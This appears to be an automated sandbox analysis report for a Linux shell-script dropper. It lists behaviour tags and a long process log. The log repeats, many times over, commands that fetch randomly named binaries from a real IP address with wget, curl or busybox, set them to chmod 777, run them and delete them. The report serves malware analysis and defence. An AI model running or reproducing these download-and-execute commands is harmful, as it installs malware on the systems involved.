Analysis Overview
SHA256
85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a
Threat Level: Shows suspicious behavior
The file 85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 02:59
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 02:59
Reported
2024-11-20 03:02
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
39s
Max time network
132s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | N/A |
| N/A | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | N/A |
| N/A | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | N/A |
| N/A | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | N/A |
| N/A | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | N/A |
| N/A | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | N/A |
| N/A | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | N/A |
| N/A | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | N/A |
| N/A | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | N/A |
| N/A | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | N/A |
| N/A | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | N/A |
| N/A | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | N/A |
| N/A | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5 | /usr/bin/curl | N/A |
Processes
/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh
[/tmp/85e6576f611d87e3ca88bd0764c96ad01c46376d6fcf2bb1b792e76f59eba88a.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/chmod
[chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
[./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/bin/rm
[rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/chmod
[chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
[./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/bin/rm
[rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/chmod
[chmod 777 aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
[./aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/bin/rm
[rm aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao]
/usr/bin/wget
[wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/chmod
[chmod 777 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
[./8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/bin/rm
[rm 8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf]
/usr/bin/wget
[wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/chmod
[chmod 777 xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
[./xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/bin/rm
[rm xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5]
/usr/bin/wget
[wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/chmod
[chmod 777 WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
[./WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/bin/rm
[rm WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in]
/usr/bin/wget
[wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/chmod
[chmod 777 DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
[./DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/bin/rm
[rm DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR]
/usr/bin/wget
[wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/chmod
[chmod 777 Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
[./Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/bin/rm
[rm Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss]
/usr/bin/wget
[wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/chmod
[chmod 777 Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
[./Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/bin/rm
[rm Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw]
/usr/bin/wget
[wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/chmod
[chmod 777 rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
[./rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/bin/rm
[rm rjYdYLogHbI2GtZk51UklOvLOURts6OQBE]
/usr/bin/wget
[wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/chmod
[chmod 777 mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
[./mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/bin/rm
[rm mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5]
/usr/bin/wget
[wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/chmod
[chmod 777 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
[./57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/bin/rm
[rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok]
/usr/bin/wget
[wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/chmod
[chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
[./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/bin/rm
[rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo]
/usr/bin/wget
[wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/chmod
[chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
[./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/bin/rm
[rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P]
/usr/bin/wget
[wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw]
